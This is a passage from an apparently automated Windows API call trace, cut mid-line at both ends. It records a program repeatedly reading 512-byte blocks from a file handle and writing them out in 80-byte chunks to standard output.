lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] GetFileType (hFile=0x50) returned 0x1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] GetFileType (hFile=0x50) returned 0x1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] GetFileType (hFile=0x50) returned 0x1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] GetFileType (hFile=0x50) returned 0x1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] GetFileType (hFile=0x50) returned 0x1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] GetFileType (hFile=0x50) returned 0x1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.144] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.144] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] GetFileType (hFile=0x50) returned 0x1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] GetFileType (hFile=0x50) returned 0x1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] GetFileType (hFile=0x50) returned 0x1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] GetFileType (hFile=0x50) returned 0x1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] GetFileType (hFile=0x50) returned 0x1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] GetFileType (hFile=0x50) returned 0x1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] GetFileType (hFile=0x50) returned 0x1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] GetFileType (hFile=0x50) returned 0x1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.145] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.145] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.145] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.146] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] GetFileType (hFile=0x50) returned 0x1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] GetFileType (hFile=0x50) returned 0x1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] GetFileType (hFile=0x50) returned 0x1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] GetFileType (hFile=0x50) returned 0x1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] GetFileType (hFile=0x50) returned 0x1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] GetFileType (hFile=0x50) returned 0x1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] GetFileType (hFile=0x50) returned 0x1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] GetFileType (hFile=0x50) returned 0x1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.147] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.147] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.147] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.147] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] GetFileType (hFile=0x50) returned 0x1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] GetFileType (hFile=0x50) returned 0x1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] GetFileType (hFile=0x50) returned 0x1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] GetFileType (hFile=0x50) returned 0x1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] GetFileType (hFile=0x50) returned 0x1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] GetFileType (hFile=0x50) returned 0x1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] GetFileType (hFile=0x50) returned 0x1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] GetFileType (hFile=0x50) returned 0x1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.148] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.148] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.148] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.148] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] GetFileType (hFile=0x50) returned 0x1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] GetFileType (hFile=0x50) returned 0x1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] GetFileType (hFile=0x50) returned 0x1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] GetFileType (hFile=0x50) returned 0x1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] GetFileType (hFile=0x50) returned 0x1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] GetFileType (hFile=0x50) returned 0x1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] GetFileType (hFile=0x50) returned 0x1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] GetFileType (hFile=0x50) returned 0x1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.149] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.149] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.149] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.149] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] GetFileType (hFile=0x50) returned 0x1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] GetFileType (hFile=0x50) returned 0x1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] GetFileType (hFile=0x50) returned 0x1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] GetFileType (hFile=0x50) returned 0x1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] GetFileType (hFile=0x50) returned 0x1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] GetFileType (hFile=0x50) returned 0x1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] GetFileType (hFile=0x50) returned 0x1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] GetFileType (hFile=0x50) returned 0x1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.150] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.150] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] GetFileType (hFile=0x50) returned 0x1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] GetFileType (hFile=0x50) returned 0x1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] GetFileType (hFile=0x50) returned 0x1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] GetFileType (hFile=0x50) returned 0x1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] GetFileType (hFile=0x50) returned 0x1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] GetFileType (hFile=0x50) returned 0x1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] GetFileType (hFile=0x50) returned 0x1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] GetFileType (hFile=0x50) returned 0x1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.151] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.151] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.151] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.151] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] GetFileType (hFile=0x50) returned 0x1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] GetFileType (hFile=0x50) returned 0x1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] GetFileType (hFile=0x50) returned 0x1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] GetFileType (hFile=0x50) returned 0x1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] GetFileType (hFile=0x50) returned 0x1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] GetFileType (hFile=0x50) returned 0x1 [0211.152] 